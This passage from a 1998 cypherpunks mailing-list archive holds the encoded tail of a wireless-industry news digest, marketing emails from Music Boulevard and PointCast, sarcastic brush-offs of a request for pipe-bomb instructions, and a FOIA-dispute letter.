cnksCk9raSBUZWxlY29tLCBJbmMuLCB3aGljaCBwcm9kdWNlZCBhbmFsb2cg
Y2VsbHVsYXIgcGhvbmVzLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5uaWtrZWku
Y28uanAvZW5ld3MvVE5LUy9wYWdlL0hpZ2gtVGVjaC5odG1sI2dlbjE0MiI+
TklLS0VJCk5FVDwvQT4pIC0gKDxBIEhSRUY9Imh0dHA6Ly9iaXoueWFob28u
Y29tL2ZpbmFuY2UvOTgwODE4L29raV9zYXlzX3FfMS5odG1sIj5ZQUhPTzwv
QT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48
Rk9OVCBTSVpFPSsxPlNpcmYncyBVcCBmb3IgR1BTIGluCkV2ZXJ5IFBob25l
PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PlRoZSB2ZW5kb3Igb2YgZ2xvYmFsIHBvc2l0aW9uaW5nIHN5c3RlbQpzaWxp
Y29uIGhvcGVzIHRvIHNlZSBpdHMgR1BTIGNvcmUgaW50ZWdyYXRlZCBpbnRv
IG5lYXJseSBoYWxmIG9mIGFsbCB3aXJlbGVzcwpwaG9uZXMgc29sZCBpbiB0
aGUgVW5pdGVkIFN0YXRlcyBvdmVyIHRoZSBuZXh0IHNldmVyYWwgeWVhcnMu
ICg8QSBIUkVGPSJodHRwOi8vd3d3LnRlY2h3ZWIuY29tL3dpcmUvc3Rvcnkv
VFdCMTk5ODA4MThTMDAwNCI+VEVDSApXRUI8L0E+KTwvRk9OVD48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5OZWdv
dGlhdGlvbnMgUmVzdW1lIGF0ClUgUyBXRVNUPC9GT05UPjwvRk9OVD48L0I+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPkludGVybWl0dGVudCBkZWxh
eXMgaW4gZGlyZWN0b3J5IGFzc2lzdGFuY2UsCmluc3RhbGxhdGlvbiBhbmQg
cmVwYWlyIHNlcnZpY2VzIGFmZmVjdGVkIGN1c3RvbWVycyBhcyBhYm91dCAx
NSwwMDAgVSBTCldFU1QgbWFuYWdlcnMgc3RhZmZlZCBzZXJ2aWNlIGNlbnRl
cnMsIHdvcmtpbmcgMTItaG91ciBzaGlmdHMuJm5ic3A7ICg8QSBIUkVGPSJo
dHRwOi8vd3d3LmRlbnZlcnBvc3QuY29tL2J1c2luZXNzL2JpejA4MTlhLmh0
bSI+REVOVkVSClBPU1Q8L0E+KSAtICg8QSBIUkVGPSJodHRwOi8vd3d3LmZv
eG1hcmtldHdpcmUuY29tLzA4MTk5OC91c3dlc3Quc21sIj5GT1gKTkVXUzwv
QT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwv
VEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFRE
PjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48
Rk9OVCBTSVpFPSsxPlBhbG1QaWxvdCB0byBHZXQgVGhpbm5lciwKRmFzdGVy
PC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRS
Pgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PlRoZSBuZXdlc3QgdmVyc2lvbiBvZiB0aGUgUGFsbVBpbG90LCBjb2RlLW5h
bWVkClJhem9yLCBpcyBkdWUgb3V0IGluIE5vdmVtYmVyIGFuZCB3aWxsIGJl
IHN1YnN0YW50aWFsbHkgc2xpbW1lciB0aGFuIGV4aXN0aW5nClBhbG1QaWxv
dHMgYXQgYXJvdW5kIDEvMy1pbmNoIHRoaWNrLCB3aXRoIGEgcmVjaGFyZ2Vh
YmxlIGxpdGhpdW0taW9uIGJhdHRlcnkuClBhbG0gQ29tcHV0aW5nIHdpbGwg
aW5jcmVhc2UgdGhlIG1lbW9yeSBjYXBhY2l0eSBpbiB0aGUgbmV3IHZlcnNp
b24gdG8KNE1CIHdpdGggYW4gZXh0cmEgMk1CIG9mIEZsYXNoIFJPTSwgYWxs
b3dpbmcgdXNlcnMgdG8gbW9yZSBlYXNpbHkgdXBncmFkZQp0aGVpciBkZXZp
Y2VzLiZuYnNwOyBUaGUgbmV3IFBhbG1QaWxvdHMgd2lsbCBzdXBwb3J0IG5l
dyBjb2xvciBMQ0Qgc2NyZWVucwphdCB0aGUgaGlnaCBlbmQgb2YgdGhlIGxp
bmUsIHdoaWNoIGlzIGV4cGVjdGVkIHRvIGdvIGZvciBqdXN0IHVuZGVyICQ1
MDAuCig8QSBIUkVGPSJodHRwOi8vd3d3Lm5ld3MuY29tL05ld3MvSXRlbS9U
ZXh0b25seS8wLDI1LDI1NDE5LDAwLmh0bWw/cGZ2Ij5DTkVUCk5FV1MuQ09N
PC9BPik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+
PC9URD4KCjxURD48QlI+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Qj48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2Ei
PjxGT05UIFNJWkU9KzE+VGVsZW1hdGljIEF1dG8gVGVjaG5vbG9neQpPZmZl
cnMgRmFyIE1vcmUgVGhhbiBEaXJlY3Rpb25zPC9GT05UPjwvRk9OVD48L0I+
PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48
Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPldoZXRoZXIgaXQncyBjYWxs
ZWQgT25TdGFyLCBSRVNDVSBvciBzb21lCm90aGVyIGJyYW5kIG5hbWUsIHNv
bWUgY29uc3VsdGFudHMgZXhwZWN0IHRoZXNlIHZvaWNlLWFjdGl2YXRlZCAi
dGVsZW1hdGljIgpzeXN0ZW1zIHRvIGJlIHRoZSBuZXh0IGJpZyBjb25zdW1l
ciBnYWRnZXQgZm9yIGNhcnMuJm5ic3A7IFRoZSBzeXN0ZW1zCmNvbWJpbmUg
Y2VsbHVsYXIgcGhvbmUgY29tbXVuaWNhdGlvbnMgd2l0aCBnbG9iYWwgcG9z
aXRpb25pbmcgc2F0ZWxsaXRlLApvciBHUFMsIHRlY2hub2xvZ3kuICg8QSBI
UkVGPSJodHRwOi8vd3d3LmRhbGxhc25ld3MuY29tL3RlY2hub2xvZ3ktbmYv
dGVjaGJpejMwNS5odG0iPkRBTExBUwpNT1JOSU5HIE5FV1M8L0E+KTwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0la
RT0rMT5PbiBEYXkgNTAwLCBDb3VudGRvd24KdG8gdGhlIE1pbGxlbm5pdW0g
QmVnaW5zPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPldpdGggNTAwIGRheXMgdG8gZ28gdW50aWwgdGhlIHllYXIgMjAw
MCwKZ292ZXJubWVudHMgYW5kIGJ1c2luZXNzZXMgYXJvdW5kIHRoZSB3b3Js
ZCBhcmUgcmFjaW5nIHRvIGZpeCB0aGUgcHJvYmxlbQotLSBidXQgdGhleSdy
ZSBydW5uaW5nIG91dCBvZiB0aW1lLiAoPEEgSFJFRj0iaHR0cDovL3d3dy51
c2F0b2RheS5jb20vbGlmZS9jeWJlci90ZWNoL2N0ZDI5NS5odG0iPlVTQQpU
T0RBWTwvQT4pIC0gKDxBIEhSRUY9Imh0dHA6Ly93d3cudGVjaHNlcnZlci5j
b20vbmV3c3Jvb20vbnRuL2luZm8vMDgxOTk4L2luZm8xMV81MDI3X25vZnJh
bWVzLmh0bWwiPk5BTkRPCk5FVDwvQT4pIC0gKDxBIEhSRUY9Imh0dHA6Ly9m
b3huZXdzLmNvbS9zY2l0ZWNoLzA4MTg5OC95MmtjcnVuY2guc21sIj5GT1gK
TkVXUzwvQT4pIC0gKDxBIEhSRUY9Imh0dHA6Ly93d3cubnl0aW1lcy5jb20v
bGlicmFyeS90ZWNoLzk4LzA4L2JpenRlY2gvYXJ0aWNsZXMvMTltaWxsZW5u
aXVtLmh0bWwiPk5FVwpZT1JLIFRJTUVTPC9BPik8L0ZPTlQ+PC9URD4KCjxU
RD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48QlI+PC9URD4K
CjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Qj48Rk9O
VCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9KzE+TGlueCBD
b21tdW5pY2F0aW9ucyBMYXVuY2hlcwpVbml2ZXJzYWwgTnVtYmVyIFNlcnZp
Y2UmbmJzcDs8L0ZPTlQ+PC9GT05UPjwvQj4KPEJSPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5pbiBXYXNoaW5ndG9u
LCBELkMuPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2
ZXRpY2EiPlRoZSBMaW54IFVuaXZlcnNhbCBOdW1iZXIgc2VydmljZSBwcm92
aWRlcwphIHNpbmdsZSBwaG9uZSBudW1iZXIgdGhhdCBpbnRlZ3JhdGVzIHZv
aWNlLCBtZXNzYWdlIGFuZCBmYXggY29tbXVuaWNhdGlvbnMuCldoZW4gYSBj
YWxsZXIgZGlhbHMgVW5pdmVyc2FsIE51bWJlciwgaXQgcmluZ3MgdXAgdG8g
dGhyZWUgbnVtYmVycyBzaW11bHRhbmVvdXNseQphbmQgYW5ub3VuY2VzIGVh
Y2ggY2FsbGVyLiAoPEEgSFJFRj0iaHR0cDovL2Jpei55YWhvby5jb20vcHJu
ZXdzLzk4MDgxOS9kY19saW54X2xhXzEuaHRtbCI+WUFIT088L0E+KTwvRk9O
VD48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFRE
PjxCUj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxCPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0la
RT0rMT5Ccml0YWluJ3MgQ2VsbG5ldCB0bwpMYXVuY2ggRGljdGF0aW9uIFNl
cnZpY2U8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+
Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZl
dGljYSI+VGhlIHNlcnZpY2Ugd291bGQgYWxsb3cgZGljdGF0aW9uIG9mIGxl
dHRlcnMKYW5kIG90aGVyIHRleHQgbWVzc2FnZXMgb250byBhIENlbGxuZXQg
ZGlnaXRhbCBtb2JpbGUgcGhvbmUgd2hpY2ggd291bGQKdGhlbiBiZSB0cmFu
c2NyaWJlZCBhbmQgY291bGQgYmUgcmV0dXJuZWQgdmlhICdwaG9uZSwgZmF4
IG9yIGUtbWFpbC4gKDxBIEhSRUY9Imh0dHA6Ly9kYWlseW5ld3MueWFob28u
Y29tL2hlYWRsaW5lcy90Yy9zdG9yeS5odG1sP3M9di9ubS8xOTk4MDgxOC90
Yy9jZWxsbmV0XzEuaHRtbCI+WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFRE
PjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoK
PFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5OZXcgVGVj
aG5vbG9neSBSYWlzZXMKRXRoaWNhbCBRdWVzdGlvbnMgZm9yIEJpZyBDb3Jw
b3JhdGlvbnM8L0ZPTlQ+PC9GT05UPjwvQj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+RW1wbG95ZWVzIGhhdmUgbW9yZSBhY2Nlc3MgdGhhbiBldmVy
IHRvCmhpZ2ggdGVjaCB0b29scyBpbiB0aGUgd29ya3BsYWNlLiZuYnNwOyBJ
bmZvcm1hdGlvbiB0ZWNobm9sb2d5IGVuYWJsZXMKd29ya2VycyB0byByZWFj
aCBhbmQgZGlzdHJpYnV0ZSBzZW5zaXRpdmUgaW5mb3JtYXRpb24uJm5ic3A7
IEFuZCBvdGhlcgpkZXZpY2VzLCBpbmNsdWRpbmcgY2VsbCBwaG9uZXMsIGNh
biBiZSB1c2VkIHNhZmVseSBvciBub3QuJm5ic3A7IE1hbnkgY29tcGFuaWVz
CmFyZSBoaXJpbmcgZXRoaWNzIG9mZmljZXJzIHRvIGFzc2lzdCB0aGVtIGlu
IGhhbmRsaW5nIHRoZSB0b3VnaCBjYWxscy4KKDxBIEhSRUY9Imh0dHA6Ly93
d3cubmFuZG8ubmV0L25ld3Nyb29tL250bi9pbmZvLzA4MTk5OC9pbmZvOF8y
MjU5Lmh0bWwiPk5BTkRPCk5FVDwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9U
RD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+
PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFD
RT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPk5va2lhJ3MgUGx1
bW1lciBBcHBvaW50ZWQKVmljZSBQcmVzaWRlbnQgR292ZXJubWVudCZuYnNw
OzxCUj4KYW5kIEluZHVzdHJ5IEFmZmFpcnM8L0ZPTlQ+PC9GT05UPjwvQj48
L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxG
T05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+Tm9raWEncyBXaWxsaWFtIFBs
dW1tZXIgaGFzIGJlZW4gYXBwb2ludGVkCnRvIGhlYWQgaXRzIFdhc2hpbmd0
b24gb2ZmaWNlIGFzIFZpY2UgUHJlc2lkZW50IG9mIEdvdmVybm1lbnQgYW5k
IEluZHVzdHJ5CkFmZmFpcnMuIENvbmN1cnJlbnRseSwgTGVvIFIuIEZpdHpz
aW1vbiBoYXMgYmVlbiBoaXJlZCBhcyBOb2tpYSdzIERpcmVjdG9yCm9mIFJl
Z3VsYXRvcnkgYW5kIEluZHVzdHJ5IEFmZmFpcnMgaW4gdGhlIEQuQy4gb2Zm
aWNlLiBGaXR6c2ltb24gaGFzIGJlZW4KYW4gYXNzb2NpYXRlIGF0dG9ybmV5
IGluIHRoZSBjb21tdW5pY2F0aW9ucyBwcmFjdGljZSBvZiB0aGUgV2FzaGlu
Z3RvbiwKRC5DLiwgbGF3IGZpcm0gb2YgVmVybmVyLCBMaWlwZmVydCwgQmVy
bmhhcmQsIE1jUGhlcnNvbiBhbmQgSGFuZC4gKDxBIEhSRUY9Imh0dHA6Ly9i
aXoueWFob28uY29tL2J3Lzk4MDgxOS9ub2tpYV8xLmh0bWwiPllBSE9PPC9B
Pik8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0tMT5Gb3IgYWRkaXRpb25hbCBuZXdzIGFi
b3V0CnRoZSB3aXJlbGVzcyBpbmR1c3RyeS0taW5jbHVkaW5nIHBlcmlvZGlj
IG5ld3MgdXBkYXRlcyB0aHJvdWdob3V0IHRoZSBkYXktLXZpc2l0CjxBIEhS
RUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPmh0dHA6Ly93d3cud293LWNv
bS5jb20uPC9BPjwvRk9OVD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5DVElBIERh
aWx5IE5ld3MgZnJvbSBXT1ctQ09NCmlzIHRyYW5zbWl0dGVkIHdlZWtkYXlz
LCBleGNlcHQgZm9yIGhvbGlkYXlzLiBWaXNpdCB1cyBvbiB0aGUgV29ybGQg
V2lkZQpXZWIgYXQgPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9w
cm9mZXNzaW9uYWwiPmh0dHA6Ly93d3cud293LWNvbS5jb20vcHJvZmVzc2lv
bmFsPC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZuYnNwOwoKPFA+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPklmIHlvdSBh
cmUgbm90IGludGVyZXN0ZWQKaW4gcmVjZWl2aW5nIHRoZSBDVElBIERhaWx5
IE5ld3MgZnJvbSBXT1ctQ09NLCBwbGVhc2Ugc2VuZCBhIG1lc3NhZ2UgdG8K
PEEgSFJFRj0ibWFpbHRvOnVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVu
aXR5bWFpbC5jb20iPnVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVuaXR5
bWFpbC5jb208L0E+LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5ic3A7Cgo8UD48
Qj4qKio8Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9
LTE+IFRoZSB0ZXJtICJ1bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0
eW1haWwuY29tIgptdXN0IGJlIGxpc3RlZCBpbiB0aGUgVE8gc2VjdGlvbiBv
ZiB0aGUgZW1haWwuPC9GT05UPjwvRk9OVD4gKioqPC9CPiZuYnNwOwoKPFA+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPlBs
ZWFzZSBOb3RlOiBTb21lIG9mIHRoZQpsaW5rcyBpbiB0b2RheSdzIG5ld3Mg
YXJlIHRpbWUgc2Vuc2l0aXZlLiZuYnNwOyBUaG9zZSBsaW5rcyBtYXkgbm90
IGJlCmF2YWlsYWJsZSBhcyBuZXdzIGNoYW5nZXMgdGhyb3VnaG91dCB0aGUg
ZGF5LiZuYnNwOyBBbHNvLCBzb21lIG5ld3Mgc291cmNlcwptYXkgYmUgc3Vi
c2NyaXB0aW9uLWJhc2VkIG9yIHJlcXVpcmUgcmVnaXN0cmF0aW9uLjwvRk9O
VD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+CjwvVEFCTEU+CiZuYnNwOzwvY2VudGVyPgo8L0JPRFk+CjwvSFRNTD4K
--Boundary..3995.1071713795.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Music Boulevard Customer Service <newmanlisa@n2k.com>
Date: Wed, 19 Aug 1998 14:26:58 -0700 (PDT)
To: musicblvd@sparklist.com
Subject: Free $10 Coupon on Music Boulevard
Message-ID: <3.0.32.19980819145001.0079dce0@207.67.22.140>
MIME-Version: 1.0
Content-Type: text/plain


Dear Music Boulevard Customer:

We are writing to you today because our records indicate that you have
established an account with us but have not made any purchases.  We are
interested in getting any comments or suggestions about your experience
with Music Boulevard to determine if there is anything we should be
doing better.

If you would like to share your thoughts, please "reply" to this email
or send an email to me at newmanlisa@n2k.com.

And, as a small token of our appreciation, we would like to give you a 
$10.00 COUPON FOR ANY MUSIC PURCHASE* on Music Boulevard, simply by
visiting: 

http://www.musicboulevard.com/69367

We are confident that once you have shopped with us, you'll agree that
Music Boulevard is a great way to find, hear and buy music.

Sincerely,

Lisa Newman,
VP/Customer Service
newmanlisa@n2k.com

*Limit one per customer.  Expires on August 31, 1998 at 11:59 PM E.S.T.

One more thing: If you are not interested in receiving future emails
from Music Boulevard, send an email to: remove-musicblvd@sparklist.com 
and you'll automatically be removed from this list. Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Wed, 19 Aug 1998 17:31:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Pipe
In-Reply-To: <6a2afa8b.35db5fac@aol.com>
Message-ID: <v0313030eb2011ea437f4@[209.66.100.148]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:28 PM -0700 8/19/98, HOPPYF1215@aol.com wrote:
>Send me info on how to make a pipe bomb. HoppyF1315


Hoppyhead,

You'll have to wait until we supply the other AOLholes with the information
they demanded on thrash music, hacking banks info, LSD manufacturing, and
get rich quick schemes.

We're struggling under the workload of millions of new AOL, PacBell,
Earthlink, Prodigy, and other newbies who have just discovered the Net.


--Tim May



"The tree of liberty must be watered periodically with the blood of
tyrants...."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist              | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pointcast@esurvey.com (PointCast Survey)
Date: Wed, 19 Aug 1998 18:18:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: PointCast Survey
Message-ID: <19980820003744948.AAA190@services>
MIME-Version: 1.0
Content-Type: text/plain


Dear Colleague,

Thank you for signing up for PointCast version 2.6 beta software 
on the PointCast Web site. We are conducting a survey to help us 
improve our download and installation process and would value your 
feedback on your experience. 

You don't need to have completed the download or installation 
to participate! 

To thank you for your help, we'll send a FREE, official PointCast 
t-shirt to the first 50 individuals who complete the on-line survey. 

To participate, just visit the URL below and submit the questionnaire 
by Thursday, August 27, 1998.

Simply copy and paste the following URL into the address/location 
window of your Internet browser (or click on the URL):
  

     http://www.decisive.com/pointcast/?id=392629

We appreciate your input and look forward to hearing from you.

Thank you for your time!
PointCast Inc.

P.S. 
This message is intended to go only to people who signed up 
for the PointCast version 2.6 beta program and supplied their 
email address.  If you would prefer not to receive future 
announcements from PointCast, reply to this email and place 
the word "UNSUBSCRIBE" in the subject line.

                         *****
If you have a comment or question, please contact us:

PointCast Web Site: http://www.pointcast.com

Technical Support:
   http://www.pointcast.com/support/pcn/forms/ask-question.html

PointCast StatusLine: 1-800-586-4733

Suggestions:
   http://www.pointcast.com/support/pcn/suggestions.html

     This survey was originally sent to: [cypherpunks@toad.com]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Hedges <hedges@infonex.com>
Date: Wed, 19 Aug 1998 18:05:38 -0700 (PDT)
To: HOPPYF1215@aol.com
Subject: Re: Pipe
In-Reply-To: <6a2afa8b.35db5fac@aol.com>
Message-ID: <Pine.SOL.3.96.980819180350.1658A-100000@cyberpass.net>
MIME-Version: 1.0
Content-Type: text/plain



Sorry, you'll need to submit your request in writing to:

Cypherpunks Bomb-Making Guide
601 4th St. NW
Washington, D.C. 20001

We will tell you all you need to know and send you a 10 page booklet
on how to make pipe bombs. Make sure you include your address.

Mark Hedges

On Wed, 19 Aug 1998 HOPPYF1215@aol.com wrote:

>Send me info on how to make a pipe bomb. HoppyF1315
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Wed, 19 Aug 1998 18:13:04 -0700 (PDT)
To: senator@wyden.senate.gov
Subject: Lawsuit ripens
Message-ID: <35DB76F9.6F38@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Wednesday 8/19/98 6:29 PM

Charles R Smith  http://www.us.net/softwar/

Dan Rather has a piece of Janet Reno appointing a special counsel to
investigate
Al Gorn tonight.

In legal terms, WE  may have a lawsuit ripening.

Barf31.txt and brez5.txt

Read your stuff about ciphering 

http://www.softwar.net/plight.html
http://www.softwar.net/test.html
http://www.softwar.net/type59.html

Making money, other than way Al Gore APPARENTLY did with cryptography
through 
RSA, is tough.

Litigants WINNING a FOIA lawsuit get to charge the losers fees.

Morales and I ANNOUNCED to magistrate judge Don Svett our rate of  $100/
hr.

We have LOTS of time into the lawsuit seen at 
http://jya.com/whpfiles.htm  THOUSANDS of 
hours.  Morales and I want our money and out of that lawsuit.

Starting at 

http://www.worldnetdaily.com/smith/csindex.html

I saw your picture at 

http://www.worldnetdaily.com/smith/980818.comcs.html

You look young.

Morales is 60 and has WHITE HAIR.

I am 61 and EXPERIENCED.  I was ASSIGNED BY SANDIA to break electronic
locks for the FBI.

  It has been over about 27 years since I directed any Ph.D. students    
    
  http://www-hto.usc.edu/software/seqaln/doc/html/gfsr.3.html         
  http://www.friction-free-economy.com/    
  http://www.mhpcc.edu/general/john.html    

http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

Morales is A VERY CAREFUL THINKER.  Like

                   Sitting Bull, whose Indian name     
                   was Tatanka Iyotake, was born in     
                   the Grand River region of     
                   present-day South Dakota in     
                   approximately 1831. His nickname     
                   was Hunkesi, meaning "Slow"     
                   because he never hurried and did     
                   everything with care.      
     
http://www.incwell.com/Biographies/SittingBull.html     

Me too, I hope.

Morales and I received our nomination materials in the mail last
Saturday.  We need to submit required information.

  The Chrysler Award for Innovation in Design, now in its sixth year,
  honors outstanding designers (or design teams).  Winners are chosen
  from across the design disciplines by a judging panel of design
  leaders.  One the selection is made, Chrysler will award $10,000
  to each winner (or winning team) at a ceremony in New York in the
  Fall of 1998.  Award winners will be flown to New York for the 
  Award Ceremony.

Additional information about this unfortunate matter

http://www.aci.net/kalliste/speccoll.htm   
http://caq.com/cryptogate  
http://jya.com/whpfiles.htm  
http://www.qainfo.se/~lb/crypto_ag.htm 

involving Sandia/New Mexico is on the net.

Zeitgeist means the 'right time.'  

Doing anything before or after the 'right time' won't work.

Suing Sandia/DOE for the invoices RSA sent to Sandia might now be the
right time.

Think SLOWLY and CAREFULLY about what I write.  And $s, of course.  We
must have a 
PROPER MOTIVATION for all of this.

bill


Wednesday 8/5/98 1:50 PM

George B. Breznay, Director
Office of Hearings and Appeals
Department of Energy
Washington, DC 20585

Dear Director Breznay:

Purpose of this letter is to ask you to properly process a Freedom of Information Act
(FOIA) appeal.

I attach a copy of my Tuesday February 17, 1999 15:11 FOIA. letter to Elva Barfield.

Albuquerque  Journal w 8/5/98 reports

  FBI Director Again Calls for Fund-Raising Probe

  By Kevin Galvin
  The Associated Press

  WASHINGTON - The FBI director told lawmakers Tuesday an independent
  counsel should be named to investigate Democratic fund raising in
  part because President Clinton and Vice President Al Gore are
  under scrutiny. ...

June 11, 1998 I received a letter from Tomas O. Mann,  Deputy Director, Office of Hearings
Hearing and Appeals.

Mann wrote

  It is unclear from your correspondence whether you are in fact appealing Ms. Barfield's March 30
  determination at this time.  If you wish to appeal that determination, please inform this Office as soon
  as possible by stating your intention in writing, either by mail to George B. Breznay, Director, Office
  Office of Hearings and Appeals, U.S. Department of Energy, Washington, D.C. 20585-0107, or by
  e-mail to George.Breznay@hq.doe.gov.

I comply with Mann's request.

Since the contents of the documents sought in my FOIA may shed light on possible wrongdoing by
VP Al Gore, I ask that you process this appeal within the time limits specified by law.

  An agency is required to make a decision on an appeal
  within 20 days (excluding Saturdays, Sundays, and legal
  holidays). It is possible for an agency to extend the time
  limits by an additional 10 days.


Sincerely,



William H. Payne
13015 Calle de Sandias NE
Albuquerque, NM 87111



Tuesday February 17, 1999 15:11

e-mail and mail

Ms. Elva Barfield
Freedom of Information Office
U. S. Department of Energy
Albuquerque Operations Office/OIEA
POB 5400
Albuquerque, NM 87185-5400
